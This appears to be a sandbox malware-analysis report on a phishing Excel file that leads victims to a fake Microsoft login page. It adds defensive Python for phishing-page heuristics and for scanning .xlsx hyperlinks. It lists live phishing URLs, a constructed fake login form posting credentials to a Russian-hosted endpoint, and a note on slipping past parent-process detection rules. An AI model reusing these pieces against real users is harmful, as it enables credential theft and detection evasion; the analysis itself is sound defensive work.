
Analysis Report Fennec Pharma.xlsx

Overview

General Information

Sample Name: Fennec Pharma.xlsx
Analysis ID: 321368
MD5: a2315b66552273d966bdc8570a6a7208
SHA1: ad82640b54ce17f43e9df68ebfa700de48df5ef0
SHA256: 8c3a18ce48dbab7971870da260421c03483e279795768bfdeb0ee7dd6079ec2b

Detection

HTMLPhisher
Score: 64
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish_10
Phishing site detected (based on image similarity)
Phishing site detected (based on logo template match)
HTML body contains low number of good links
HTML title does not match URL
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2376 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • iexplore.exe (PID: 2552 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 4EB098135821348270F27157F7A84E65)
    • iexplore.exe (PID: 2856 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2552 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
  • cleanup

Note that iexplore.exe sits at the top level of the tree rather than under EXCEL.EXE and carries the -Embedding switch: the browser was started through COM activation, not spawned directly by Excel, so detection rules that require EXCEL.EXE to be the parent of the browser process do not match this chain.

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dfce06801e1a85d6d06f1fdd4475dacd[1].htm | JoeSecurity_HtmlPhish_10 | Yara detected HtmlPhish_10 | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html | SlashNext: Label: Fake Login Page, type: Phishing & Social Engineering

Phishing:

Yara detected HtmlPhish_10
Source: Yara match | File source: 305090.3.links.csv, type: HTML
Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\dfce06801e1a85d6d06f1fdd4475dacd[1].htm, type: DROPPED
Phishing site detected (based on image similarity)
Source: https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5faba6db73aef50019af7085/rC56cpX1uS2qJKOxJ-5Sb8u-.svg | Matcher: Found strong image similarity, brand: Microsoft
Phishing site detected (based on logo template match)
Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html | Matcher: Template: microsoft matched
HTML body contains low number of good links
Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html | HTTP Parser: Number of links: 0
HTML title does not match URL
Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html | HTTP Parser: Title: Log-In does not match URL
Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html | HTTP Parser: No <meta name="author".. found
Source: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI | HTTP Parser: No <meta name="author".. found
Source: https://workflowy.com/signup/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI | HTTP Parser: No <meta name="author".. found
Source: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html | HTTP Parser: No <meta name="copyright".. found
Source: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI | HTTP Parser: No <meta name="copyright".. found
Source: https://workflowy.com/signup/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI | HTTP Parser: No <meta name="copyright".. found

Networking:

IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 74.125.140.154
Source: Joe Sandbox View | IP Address: 104.16.19.94
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
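The "HTTP Parser" signals in the Phishing section (title versus URL, link count, missing meta author/copyright) are cheap heuristics that can be reproduced outside the sandbox. The Python below is an added example, not Joe Sandbox's parser and not code from the report: it runs those checks on a constructed page that mimics what the report describes (title "Log-In", zero links, no meta tags) and a constructed benign WorkFlowy login page, and additionally flags a credential form whose action points at a different host. Two assumptions are built in: the link-count threshold of 3 (the report states only "Number of links: 0"), and that https://ukrainianpolicy.ru/Dee23ope11nov/next.php is the form action of the phishing page; the report shows that URL only as a string found inside the dropped HTML.

```python
"""Added example: HTML phishing-page heuristics on constructed sample pages (not Joe Sandbox code)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed threshold; the report only states "Number of links: 0" for the phishing page.
MIN_GOOD_LINKS = 3


class PageFacts(HTMLParser):
    """Collect the title, anchors, form actions and <meta name=...> tags of one HTML page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self.hrefs = []
        self.form_actions = []
        self.meta_names = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "a" and a.get("href"):
            self.hrefs.append(a["href"])
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "meta" and a.get("name"):
            self.meta_names.add(a["name"].lower())

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def title_tokens(title):
    """Words of the <title> worth comparing against a hostname (very short tokens dropped)."""
    return {t for t in re.split(r"[^a-z0-9]+", title.lower()) if len(t) > 2}


def analyse(page_url, html):
    """Return the list of heuristic findings for a page that was fetched from page_url."""
    facts = PageFacts()
    facts.feed(html)
    host = (urlsplit(page_url).hostname or "").lower()
    findings = []

    # "HTML title does not match URL": no title word occurs anywhere in the hostname.
    tokens = title_tokens(facts.title)
    if tokens and not any(t in host for t in tokens):
        findings.append("title_url_mismatch")

    # "HTML body contains low number of good links": count absolute http(s) anchors only.
    good = [h for h in facts.hrefs if urlsplit(h).scheme in ("http", "https")]
    if len(good) < MIN_GOOD_LINKS:
        findings.append("few_good_links")

    # Missing <meta name="author"> / <meta name="copyright">, as reported by the HTTP Parser.
    for name in ("author", "copyright"):
        if name not in facts.meta_names:
            findings.append(f"no_meta_{name}")

    # A credential form posting to another host is the classic harvest pattern (assumption, see lead-in).
    for action in facts.form_actions:
        target = (urlsplit(action).hostname or "").lower()
        if target and target != host:
            findings.append(f"form_posts_offsite:{target}")
    return findings


# Constructed sample pages; neither is the dropped file from the report.
PHISH_URL = "https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html"
PHISH_HTML = """<html><head><title>Log-In</title></head><body>
<img src="https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5faba6db73aef50019af7085/rC56cpX1uS2qJKOxJ-5Sb8u-.svg" alt="">
<form method="post" action="https://ukrainianpolicy.ru/Dee23ope11nov/next.php">
  <input name="email"><input name="password" type="password"><button>Sign in</button>
</form></body></html>"""

BENIGN_URL = "https://workflowy.com/login/"
BENIGN_HTML = """<html><head><title>Log in - WorkFlowy</title>
<meta name="author" content="WorkFlowy"><meta name="copyright" content="WorkFlowy"></head><body>
<a href="https://workflowy.com/">Home</a> <a href="https://workflowy.com/signup/">Sign up</a>
<a href="https://workflowy.com/accounts/password_reset/">Forgot password</a>
<form method="post" action="/login/"><input name="username"><input name="password"></form>
</body></html>"""

if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (BENIGN_URL, BENIGN_HTML)):
        print(url, "->", analyse(url, html) or ["no findings"])
```

The title heuristic is deliberately weak (a single shared token is enough to pass), which is why the sandbox combines it with the image and logo matchers above; the off-site form check is the one signal here that points directly at the harvesting endpoint.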
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7187B60E.png
Source: document_view.min[1].js.3.dr | String found in binary or memory: re glad you like WorkFlowy. Please share it with your friends!"),!c.d()&&o.createElement(o.Fragment,null,o.createElement("div",{className:Object(l.e)({marginBottom:"24px",lineHeight:"20px",fontSize:"13px"})},o.createElement("strong",null,"When a friend signs up through your Facebook post, we'll give you"," ",s===d?"both "+s+" more monthly items.":s+" more monthly items."+(d?" They'll get "+d+" more items too.":""))," ","You currently have ",i," WorkFlowy items per month.")),o.createElement(a.b,{buttonStyle:a.a.Primary,onClick:function(){var e=f+"&utm_campaign=friend_recommendation_prompt_10_days&utm_medium=facebook&utm_source=wf";window.open("https://www.facebook.com/sharer/sharer.php?u="+e,"Share WorkFlowy","height=640,width=558,left=50,top=50"),_gaq.push(["_trackPageview","/virtual/friend_recommendation_prompt/10_days/facebook_share_button_clicked"])}},"Share WorkFlowy on Facebook")))}},t}return d(t,e),t.prototype.componentWillUnount=function(){_gaq.push(["_trackPageview","/virtual/friend_recommendation_prompt/10_days/rating_dialog_closed/"])},t.prototype.render=function(){return o.createElement(o.Fragment,null,o.createElement(u.b,null,"What do you think of WorkFlowy?"),o.createElement("div",{className:Object(l.e)({marginTop:"24px",marginBottom:"24px"})},"Please click a star to rate WorkFlowy."),o.createElement(p,{onChange:this.onRatingChange}),o.createElement("div",{className:Object(l.e)({marginTop:"24px",marginBottom:"12px",fontSize:"13px",lineHeight:"20px"})},"You | equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: workflowy.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.3.dr | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.3.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: document_view.min[1].js.3.dr | String found in binary or memory: http://getfirefox.com
Source: document_view.min[1].js.3.dr | String found in binary or memory: http://google.com/chrome
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: http://jquery.org/license
Source: popper.min[1].js.3.dr | String found in binary or memory: http://opensource.org/licenses/MIT).
Source: ga[1].js.3.dr | String found in binary or memory: http://www.google-analytics.com
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=378607
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=449857
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=470258
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.chromium.org/p/chromium/issues/detail?id=589347
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.jquery.com/ticket/12359
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.jquery.com/ticket/13378
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=136851
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=137337
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugs.webkit.org/show_bug.cgi?id=29084
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=687787
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://code.jquery.com/jquery-3.1.1.min.js
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://code.jquery.com/jquery-3.3.1.js
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://developer.mozilla.org/en-US/docs/CSS/display
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://drafts.csswg.org/cssom/#common-serializing-idioms
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://drafts.csswg.org/cssom/#resolved-values
Source: free-fa-regular-400[1].eot.3.dr, free.min[1].css.3.dr | String found in binary or memory: https://fontawesome.com
Source: free.min[1].css.3.dr | String found in binary or memory: https://fontawesome.com/license/free
Source: free-fa-regular-400[1].eot.3.dr, free-fa-solid-900[1].eot.3.dr | String found in binary or memory: https://fontawesome.comhttps://fontawesome.comFont
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
Source: css[1].css.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/archivonarrow/v12/tss0ApVBdCYD5Q7hcxTE1ArZ0bbwiXo.woff)
Source: bootstrap.min[1].css.3.dr, bootstrap.min[1].js.3.dr | String found in binary or memory: https://getbootstrap.com)
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://github.com/eslint/eslint/issues/3229
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://github.com/eslint/eslint/issues/6125
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://github.com/jquery/jquery/pull/557)
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://github.com/jquery/sizzle/pull/225
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anon
Source: bootstrap.min[1].css.3.dr, bootstrap.min[1].js.3.dr | String found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
Source: bootstrap.min[1].js.3.dr | String found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://html.spec.whatwg.org/#strip-and-collapse-whitespace
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#category-listed
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabled
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://html.spec.whatwg.org/multipage/forms.html#concept-option-disabled
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-disabled
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://html.spec.whatwg.org/multipage/scripting.html#selector-enabled
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://html.spec.whatwg.org/multipage/syntax.html#attributes-2
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespace
Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.dr | String found in binary or memory: https://jamif-cdn3d.us
Source: ~DF3768AA9CB305EF1C.TMP.2.dr | String found in binary or memory: https://jamif-cdn3d.us-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.html
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://jquery.com/
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://jquery.org/license
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://jsperf.com/getall-vs-sizzle/2
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://jsperf.com/thor-indexof-vs-for/5
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://kit.fontawesome.com/585b051251.js
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://promisesaplus.com/#point-48
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://promisesaplus.com/#point-54
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://promisesaplus.com/#point-57
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://promisesaplus.com/#point-59
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://promisesaplus.com/#point-61
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://promisesaplus.com/#point-64
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://promisesaplus.com/#point-75
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5faba6db73aef50019af7085/Z
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://s3.amazonaws.com/simbla-static-2/2020/11/5faba665321d68001d4fc0e4/5faba6db73aef50019af7085/r
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://sizzlejs.com/
Source: ga[1].js.3.dr | String found in binary or memory: https://ssl.google-analytics.com
Source: Tdcv9KOl0AuohEPI[1].htm0.3.dr | String found in binary or memory: https://ssl.google-analytics.com/ga.js
Source: ga[1].js.3.dr | String found in binary or memory: https://ssl.google-analytics.com/j/__utm.gif
Source: ga[1].js.3.dr | String found in binary or memory: https://stats.g.doubleclick.net/j/collect?
Source: dfce06801e1a85d6d06f1fdd4475dacd[1].htm.3.dr | String found in binary or memory: https://ukrainianpolicy.ru/Dee23ope11nov/next.php
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/
Source: jquery-3.3.1[1].js.3.dr | String found in binary or memory: https://web.archive.org/web/20141116233347/http://fluidproject.org/blog/2008/01/09/getting-setting-a
Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.dr | String found in binary or memory: https://workflowy-east-1.linodeobjects.com/dfce06801e1a85d6d06f1fdd4475dacd.htmlRoot
Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.dr | String found in binary or memory: https://workflowy.com/
Source: signup[1].htm0.3.dr, login[1].htm0.3.dr | String found in binary or memory: https://workflowy.com/accounts/password_reset/
Source: ~DF3768AA9CB305EF1C.TMP.2.dr | String found in binary or memory: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI
Source: ~DF3768AA9CB305EF1C.TMP.2.dr | String found in binary or memory: https://workflowy.com/login/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI&Log
Source: imagestore.dat.3.dr | String found in binary or memory: https://workflowy.com/media/i/favicon.ico
Source: imagestore.dat.3.dr | String found in binary or memory: https://workflowy.com/media/i/favicon.ico~
Source: document_view.min[1].js.3.dr | String found in binary or memory: https://workflowy.com/referrals/
Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.dr | String found in binary or memory: https://workflowy.com/s/this-doRoot
Source: ~DF3768AA9CB305EF1C.TMP.2.dr, {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.dr | String found in binary or memory: https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPI
Source: ~DF3768AA9CB305EF1C.TMP.2.dr | String found in binary or memory: https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPI#/7686a5f8c6e6
Source: {9612F055-2BD4-11EB-ADCF-ECF4BBB5915B}.dat.2.dr | String found in binary or memory: https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPIRoot
Source: ~DF3768AA9CB305EF1C.TMP.2.dr | String found in binary or memory: https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPInThis
Source: ~DF3768AA9CB305EF1C.TMP.2.dr | String found in binary or memory: https://workflowy.com/signup/?next=/s/this-document-is-too/Tdcv9KOl0AuohEPI
Source: ga[1].js.3.dr | String found in binary or memory: https://www.google.%/ads/ga-audiences?
Source: ga[1].js.3.dr | String found in binary or memory: https://www.google.com/analytics/web/inpage/pub/inpage.js?
Source: unknown | Network traffic detected: HTTP traffic on port 443, in both directions, for 14 TCP connections from local ports 49165, 49166, 49167, 49170, 49171, 49181, 49182, 49184, 49186, 49187, 49199, 49200, 49201 and 49202
System Summary:

Source: classification engine | Classification label: mal64.phis.winXLSX@4/75@12/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Fennec Pharma.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD123.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2552 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2552 CREDAT:275457 /prefetch:2
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Fennec Pharma.xlsx | Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (10 occurrences)
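The only fact the report records about the spreadsheet itself is the embedded image xl/media/image1.png; the sample contains no macro and no malware configuration, and the browser's first recorded URL is the WorkFlowy share link. In an OOXML package a picture becomes clickable through a hyperlink relationship in the drawing part's .rels file, so that is the place to look when triaging an image-only lure. The Python below is an added example, not the sample and not Joe Sandbox code: it builds a minimal constructed .xlsx with one picture carrying an external hyperlink, then lists media parts, every TargetMode="External" relationship, and the picture-to-URL mapping. That the real document links its image to https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPI is an assumption used only for the constructed sample; the report shows the browser opening that URL but does not say how the click was wired.

```python
"""Added example: list media parts and external hyperlinks in an .xlsx package (not Joe Sandbox code)."""
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
XDR_NS = "http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing"
A_NS = "http://schemas.openxmlformats.org/drawingml/2006/main"

# Assumed lure target for the constructed sample; the report only shows the browser opening it.
LURE_URL = "https://workflowy.com/s/this-document-is-too/Tdcv9KOl0AuohEPI"


def list_parts(xlsx_bytes, prefix):
    """Names of package parts under prefix, e.g. 'xl/media/' for embedded images."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        return sorted(n for n in z.namelist() if n.startswith(prefix))


def external_relationships(xlsx_bytes):
    """(rels part, relationship type, target) for every TargetMode="External" relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        for name in sorted(z.namelist()):
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rtype, rel.get("Target")))
    return found


def picture_hyperlinks(xlsx_bytes):
    """(picture name, URL) for every drawing picture that carries an <a:hlinkClick>."""
    out = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as z:
        names = set(z.namelist())
        for name in sorted(names):
            if not (name.startswith("xl/drawings/") and name.endswith(".xml")):
                continue
            # r:id values inside the drawing resolve through the drawing's own .rels part.
            rels_name = name.replace("xl/drawings/", "xl/drawings/_rels/", 1) + ".rels"
            rels = {}
            if rels_name in names:
                for rel in ET.fromstring(z.read(rels_name)).iter(f"{{{REL_NS}}}Relationship"):
                    rels[rel.get("Id")] = rel.get("Target")
            for pr in ET.fromstring(z.read(name)).iter(f"{{{XDR_NS}}}cNvPr"):
                click = pr.find(f"{{{A_NS}}}hlinkClick")
                if click is not None:
                    out.append((pr.get("name"), rels.get(click.get(f"{{{R_NS}}}id"))))
    return out


def build_sample_xlsx():
    """Constructed stand-in for the sample: one worksheet drawing whose picture links to LURE_URL."""
    drawing_rels = f"""<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{R_NS}/image" Target="../media/image1.png"/>
  <Relationship Id="rId2" Type="{R_NS}/hyperlink" Target="{LURE_URL}" TargetMode="External"/>
</Relationships>"""
    drawing = f"""<xdr:wsDr xmlns:xdr="{XDR_NS}" xmlns:a="{A_NS}" xmlns:r="{R_NS}">
  <xdr:oneCellAnchor>
    <xdr:from><xdr:col>0</xdr:col><xdr:colOff>0</xdr:colOff><xdr:row>0</xdr:row><xdr:rowOff>0</xdr:rowOff></xdr:from>
    <xdr:ext cx="914400" cy="914400"/>
    <xdr:pic>
      <xdr:nvPicPr><xdr:cNvPr id="2" name="Picture 1"><a:hlinkClick r:id="rId2"/></xdr:cNvPr><xdr:cNvPicPr/></xdr:nvPicPr>
      <xdr:blipFill><a:blip r:embed="rId1"/><a:stretch><a:fillRect/></a:stretch></xdr:blipFill>
      <xdr:spPr><a:prstGeom prst="rect"><a:avLst/></a:prstGeom></xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:oneCellAnchor>
</xdr:wsDr>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("xl/media/image1.png", b"\x89PNG\r\n\x1a\n")  # PNG signature only (constructed)
        z.writestr("xl/drawings/drawing1.xml", drawing)
        z.writestr("xl/drawings/_rels/drawing1.xml.rels", drawing_rels)
    return buf.getvalue()


if __name__ == "__main__":
    data = build_sample_xlsx()
    print("media parts:", list_parts(data, "xl/media/"))
    print("external relationships:", external_relationships(data))
    print("clickable pictures:", picture_hyperlinks(data))
```

Running the three functions against a real file is the same call with the file's bytes; external_relationships also surfaces cell hyperlinks (sheet .rels) and remote template or OLE links, which is why it scans every .rels part rather than only the drawings.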

Mitre Att&ck Matrix

Matched techniques, with the number of matching signatures in brackets (matrix cells without a match are not listed):

Tactic                  Technique
Privilege Escalation    Process Injection (1)
Defense Evasion         Process Injection (1), Masquerading (1)
Discovery               File and Directory Discovery (1), System Information Discovery (1)
Command and Control     Encrypted Channel (2), Non-Application Layer Protocol (1), Application Layer Protocol (2), Ingress Tool Transfer (1)
